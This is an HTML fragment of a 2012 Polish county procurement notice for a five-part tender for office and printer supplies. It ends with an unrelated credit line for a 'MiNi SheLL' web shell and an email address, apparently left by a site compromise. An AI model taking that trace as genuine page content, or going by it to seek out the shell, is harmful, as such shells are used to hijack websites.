<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty - Załącznik nr 1 wraz ze Specyfikacjami cenowymi - Załącznik A, B, C, D, E, dotyczącymi poszczególnych części przedmiotu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.stalowowolski.bip.podkarpackie.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Stalowej Woli , 37-450 Stalowa Wola ul. Podleśna 15,
pokój nr 311.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2012 godzina 11:00, miejsce: Starostwo Powiatowe w Stalowej Woli , 37-450 Stalowa Wola ul. Podleśna 15,
pokój nr 108 ( sekretariat ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I  część	:  Sukcesywna dostawa materiałów biurowych i papierniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa materiałów biurowych i papierniczych zgodnie z  pkt. III Opisu przedmiotu zamówienia SIWZ - I Część - Załącznik A.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II  część	:  Sukcesywna dostawa materiałów toaletowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna materiałów toaletowych zgodnie z pkt. III Opisu przedmiotu zamówienia SIWZ - II Część - Załącznik B.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.76.10.00-2, 33.76.30.00-6, 33.71.19.00-6, 39.83.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> III część	:  Sukcesywna dostawa oryginalnych materiałów eksploatacyjnych do                  kserokopiarek i oryginalnych (równoważnych) materiałów eksploatacyjnych do drukarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa oryginalnych materiałów eksploatacyjnych do  kserokopiarek i oryginalnych (równoważnych) materiałów eksploatacyjnych do drukarek  zgodnie z  pkt. III Opisu przedmiotu zamówienia SIWZ - III  Część - Załącznik C.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> IV część 	: Sukcesywna dostawa materiałów papierniczych do ploterów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa materiałów papierniczych do ploterów zgodnie z  pkt. III Opisu przedmiotu zamówienia SIWZ - IV  Część - Załącznik D.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> V część 	: Sukcesywna dostawa oryginalnych materiałów  eksploatacyjnych do   ploterów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa oryginalnych materiałów eksploatacyjnych do ploterów zgodnie z  pkt. III Opisu przedmiotu zamówienia SIWZ - V  Część - Załącznik E.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com